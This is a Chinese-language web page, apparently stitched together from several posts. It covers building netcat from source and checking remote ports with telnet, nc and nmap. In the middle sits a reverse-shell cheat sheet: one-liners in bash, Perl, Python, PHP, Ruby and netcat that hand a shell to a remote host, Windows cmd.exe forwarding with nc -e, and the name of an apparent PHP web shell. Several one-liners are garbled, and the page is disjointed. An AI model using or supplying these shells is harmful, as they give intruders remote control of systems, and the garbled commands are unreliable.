linux怎么安装netcat

etcat-0.7.1.tar.gz

然后当然是解压了

tar zxvf netcat-0.7.1.tar.gz

解压完毕之后会生成目录，要cd进去

cd netcat-0.7.1

然后进行编译前的配置。

./configure

配置完了之后就可以make编译了。

编译成功就生成了netcat可执行的文件了，位于src目录，cd进去进行运行./netcat -h.如图

本地Windows监听

nc -vv -l -p 1234

远程Windows转发

nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234

远程Linux转发

./netcat 8.8.8.8 1234 -e /bin/sh

ReverseShell.c

ReverseShell.pl

ReverseShell.py

phpspy.php

———————NetCat for linux 参数e————————-

下载netcat-0.7.1.tar.gz

tar zxvf netcat-0.7.1.tar.gz

cd netcat-0.7.1

./configure

make

cd src

./netcat -h

——————————————————————–

一句话反d命令

[Bash]

bash -i >&/dev/tcp/10.0.0.1/8080 0>&1

[PERL]

perl -e ‘use Socket$i=”10.0.0.1″$p=1234socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”))if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”)open(STDOUT,”>&S”)open(STDERR,”>&S”)exec(“/bin/sh -i”)}’

[Python]

python -c ‘import socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((“10.0.0.1″,1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])’

[PHP]

php -r ‘$sock=fsockopen(“10.0.0.1″,1234)exec(“/bin/sh -i <&3 >&3 2>&3″)’

[Ruby]

ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1″,1234).to_iexec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

[Netcat]

nc -e /bin/sh 10.0.0.1 1234

rm /tmp/fmkfifo /tmp/fcat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

你需要安装nc 确定你的DNS可以解析公网地址(命令：vi /etc/resolv.conf，添加:nameserver 222.172.200.68) 使用命令：yum install nc 安装完成再使用命令：nc -l 5001

这个非常简单，telnet、nc和nmap这3个命令就可以轻松实现，下面我简单介绍一下实现过程，感兴趣的朋友可以自己尝试一下： telnet 这是基于telnet协议实现的一个远程登录命令，可以直接用于测试远程Linux服务器是否开启指定端口，安装的话，输入命令“yum install -y telnet”（或者“apt install -y telnet”）就行，使用方式“telnet 服务器IP地址 端口号”，如下，这里以端口22为例，如果返回结果为Connected，则说明端口开启，如果为refused，则说明端口关闭：nc 也即netcat，一个简单实用的Unix（Linux）工具，主要用来读写网络间连接的数据，可以很方便的查看远程Linux服务器是否开启指定端口，如下，这里以3306端口为例，如果返回结果为Connected，则说明端口开启，如果为timed out，则说明端口关闭：更多参数和说明的话，可以使用命令“nc -h”进行查看，官方文档解释的非常清楚详细，如下：nmap 这是一个专门用于网络嗅探的工具，在渗透测试中经常会用到，也可以很方便的查看远程Linux服务器是否开启指定端口，安装的话，输入命令“yum install -y nmap”（或者“apt install -y nmap”）就行，如下，这里以80，21，3306这3个端口为例，如果返回结果为open，则说明端口开启，如果为filtered，则说明端口关闭：更多参数和功能的话，可以使用帮助命令“nmap -h”进行查看，官方文档解释的非常详细清楚，一目了然，如下：至此，我们就介绍完了使用telnet、nc和nmap这3个命令来查看远程Linux服务器是否开启指定端口。总的来说，这3种方式都非常简单，只要你有一定的Linux基础，熟悉一下相关参数和说明，很快就能掌握的，网上也有相关教程和资料，介绍的非常详细，感兴趣的话，可以搜一下，希望以上分享的内容能对你有所帮助吧，也欢迎大家评论、留言进行补充。 方法一，telnet host port 方法二，nc -t host port 其中-t代表tcp，-u是udp 方法三，任意语言，优先python，写一段 socket程序，调用connect函数看看是否成功 ping一下ip地址加上你想要的端口，就知道端口打开没有

---